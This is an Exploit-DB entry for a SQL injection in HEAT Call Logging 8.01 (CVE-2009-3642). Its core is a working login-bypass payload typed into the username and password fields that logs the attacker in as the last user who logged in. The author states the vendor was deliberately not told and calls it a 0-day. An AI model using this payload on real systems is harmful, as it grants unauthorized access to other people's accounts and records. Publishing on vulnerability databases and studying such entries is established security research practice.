HEAT Call Logging 8.01 SQL Injection

2009-09-28T00:00:00
ID EDB-ID:9809
Type exploitdb
Reporter 0 0
Modified 2009-09-28T00:00:00

Description

HEAT Call Logging 8.01 SQL Injection. CVE-2009-3642. Webapps exploit for asp platform

                                        
                                            [=[ ;otokoyama; ]=]


-=[HEAT Call Logging Version 8.01]=-
"The HEAT family is a comprehensive service solution,
combining core technologies with a variety of expansion options,
so any enterprise can build a tailored solution."

-=[web]=-
http://www.frontrange.com/heat.aspx

-=[attack]=-
U:' OR HEATPass IS NOT NULL OR HEATPass = '
P:' OR HEATPass IS NOT NULL OR HEATPass = '

-=[Effect]=-
Logs in as last logged in user.
There would be many variations of the above, but who can be bothered.

-=[NOTICE]=-
Due to vendor and product distaste I have not informed them of this vuln.

I guess this is a 0-day then..

Via their webpage current version appears to be 9.0,
could apply to this version aswell

SHOUTS:4chan for being shit, yes I will troll in a POC.


antilimit owns you